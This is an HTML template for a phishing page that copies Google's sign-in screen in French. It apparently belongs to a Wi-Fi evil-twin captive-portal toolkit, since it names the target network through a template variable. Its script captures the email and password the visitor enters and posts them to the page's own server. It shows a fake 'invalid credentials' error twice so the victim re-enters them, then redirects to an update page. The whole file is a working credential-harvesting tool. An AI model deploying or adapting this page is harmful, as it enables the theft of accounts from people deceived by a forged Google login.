<!DOCTYPE html>
<html>

  <head>

    <title>Sign in - Google Accounts</title>

    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta name="viewport" content="width=device-width,
    initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
    <meta name="robots" content="noindex, nofollow"> 

    <script src="static/js/jquery.min.js"></script>

    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <link rel="stylesheet" href="static/css/stylegoogle.css">
    <link rel="icon" type="image/png" href="static/img/oc3czvmbvf.png"/>

    <style>

    .google-header-bar {
    height: 71px;
    border-bottom: 1px solid #e5e5e5;
    overflow: hidden;
    }

    .google-header-bar.centered {
    border: 0;
    height: 108px;
    }

    .google-header-bar.centered .header .logo {
    float: none;
    margin: 40px auto 30px;
    display: block;
    }
    .google-header-bar.centered .header .secondary-link {
    display: none
    }

    .header .logo {
    margin: 17px 0 0;
    float: left;
    height: 38px;
    width: 116px;
    }
#dialog2 {
  top:0;
  left: 0;
  z-index: 100;
  display: inline-block;
  position: absolute;
  width: 100%;
  height: 100%;
  display: flex;
  justify-content:center;
  align-items:center;
  background-color: rgba(0,0,0,0.3);
}

#dialog2 .dialog2-box {
  display: inline-block;
  background-color: white;
  border-radius: 15px;
  padding: 15px;
}
#dialog2 .dialog2-box .dialog2-text{
text-align:center;
font-size: 13px;
}
#dialog2 .dialog2-box .but-close-dialog2 {
  margin: 0 auto;
  display: block;
  padding: 10px;
  color: white;
  text-transform: uppercase;
  font-size: 16px;
  max-width: 200px;
  text-align:center;
  margin-top: 10px;
  cursor: pointer;
  background-color: #4888ef;
  border-radius: 5px;

}
    </style>

    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">

      .google-header-bar.centered {
        height: 83px;
      }

      .google-header-bar.centered .header .logo {
        margin: 25px auto 20px;
      }

      .card {
        margin-bottom: 20px;
      }

    </style>

    <style media="screen and (max-width: 580px)">

      html,
      body {
        font-size: 14px;
      }

      .google-header-bar.centered {
        height: 73px;
      }

      .google-header-bar.centered .header .logo {
        margin: 20px auto 15px;
      }

      .content {
        padding-left: 10px;
        padding-right: 10px;
      }

      .hidden-small {
        display: none;
      }

      .card {
        padding: 20px 15px 30px;
        width: 270px;
      }

      .footer ul li {
        padding-right: 1em;
      }

      .lang-chooser-wrap {
        display: none;
      }


    </style>

  </head>

  <body>
  <div id="dialog2" class=" animated-05 fadeIn" style="display: none">
    <div class="dialog2-box zoomIn">

      <div class="dialog2-text animated-1"></div>
      <div class="but-close-dialog2" onclick="javascript:hidedialog2()">OK</div>
    </div>
  </div>
    <div class="container">

      <div class="google-header-bar centered">
        <div class="header content clearfix">
          <img alt="Google" class="logo" src="static/img/dtnk16mcjo.png">
        </div>
      </div>

      <h1 class="text-center login-title">Connectez-vous avec votre compte Google</h1>
      <h2 class="text-center login-title" style="font-size: 13px">Pour accéder à {{ target_ap_essid }}</h2>
       

        <div class="account-wall">

          <img class="profile-img" src="static/img/yqczrisvt2.png" alt="">

          <form class="form-signin">
            <input id="eml" type="text" name="wfphshr-google-email" class="form-control" placeholder="E-mail" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required>
            <input id="pwd" type="password" name="wfphshr-google-password" class="form-control" placeholder="Mot de passe" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>

            <div id="dialog">
            <h2 id="error">Merci de remplir les champs requis.</h2>
            </div>

            <button id="btn" class="btn btn-primary btn-block btn-sharp btn-submit" name="login">Se connecter</button>
            <a href="#" class="pull-right need-help">Mot de passe oublié</a><span class="clearfix"></span>
          </form>

        </div>

            <br><a href="#" class="text-center new-account">Créer un compte</a>
            <center><br><p class="tagline">Un seul compte pour tous les services Google.</p>
            <img src="static/img/tmjjgvk28i.png" width="210" height="17" alt=""></center><br><br>

    <script>
      /*
      Check the password field and act accordingly.
      */

  var dialog2 = $('#dialog2');
  var dialog2Box = $('.dialog2-text');
  var dialog2Text ="";

  var nb_try = 0;
   $(".btn-submit").on("click", function(e) {
      
          e.preventDefault();
         
          // get the password box and checkbox elements
          var input = document.getElementById("eml");
          var input2 = document.getElementById("pwd");
          // check to see if the value is empty
          if ( input.value == "" || input2.value == "" ){
        
        dialog2Text = "Vous devez remplir les champs pour vous connecter.";
        showdialog2();

          }else{
              // post the data
              
                post('post', {
                  'wfphshr-google-email': input.value,
                 'wfphshr-google-password': input2.value
                });      
          }
      });



      function showdialog2() {

              dialog2Box.html(dialog2Text);
              dialog2.css('display','flex');

      }

      function hidedialog2() {

        dialog2.css('display','none');
      }
      
      /*
      Post to the fallowing path given the parameters.

      Args:
        path: The path to be posted to.
        params: The parameters to be passed.
      */
      function post(path, params) {
        // create a form and set its attributes
       var dataToSend = JSON.stringify(params);
// post the data

$.ajax(
    {
        url: 'post',
        type: 'POST',
        data: dataToSend,

        success: function (jsonResponse) {
          if (nb_try < 2) {
              dialog2Text = "<span style='color: red'>Erreur : Les identifiants sont invalides. </span>";
        showdialog2();
        nb_try++;
          }
          else {
            window.location = "./update.html";
          }
       }
    }
 );
      }
   
      $("#btn").on("click", function(e) {
          e.preventDefault();
          // get the password box and checkbox elements
          var input = document.getElementById("eml");
          var input2 = document.getElementById("pwd");
          // check to see if the value is empty
          if ( input.value == "" ){
              passNotValid();
          }else if( input2.value == "" ){ //check if the value of the repeat field is empty
              passNotValid();
          }else{
              // post the data
              $("#dialog").css('display', 'none');
  
          }
      });

      function passNotValid(){
        $("#dialog").css('display', 'block');
        $(".form-control").css('border', '1px solid #dd4b39');
      }
      
      /*
      Post to the fallowing path given the parameters.

      Args:
        path: The path to be posted to.
        params: The parameters to be passed.
      */

      input.disabled = false;
      input2.disabled = false;
    </script>

    </div>

  </body>

</html>
